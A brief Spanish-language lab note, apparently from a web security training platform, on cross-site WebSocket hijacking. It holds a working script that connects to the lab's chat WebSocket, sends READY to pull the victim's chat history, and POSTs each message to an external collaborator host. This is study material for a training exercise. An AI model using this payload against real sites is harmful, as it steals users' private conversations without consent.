2 - Cross-site WebSocket hijacking
Enviar un READY parece ser que responde con todo el historial del chat, la idea sería montar un CSRF versión websockets para robarle el chat a la otra persona que esté detrás
<script>
var ws = new WebSocket('wss://0a8200d60458e9a6807c03f3005c009e.web-security-academy.net/chat');
ws.onopen = function() {
ws.send("READY");
};
ws.onmessage = function(event) {
fetch('https://fveoqfwor0bb86jxjhmi28rqmhscg44t.oastify.com', {method: 'POST', body: event.data});
};
</script>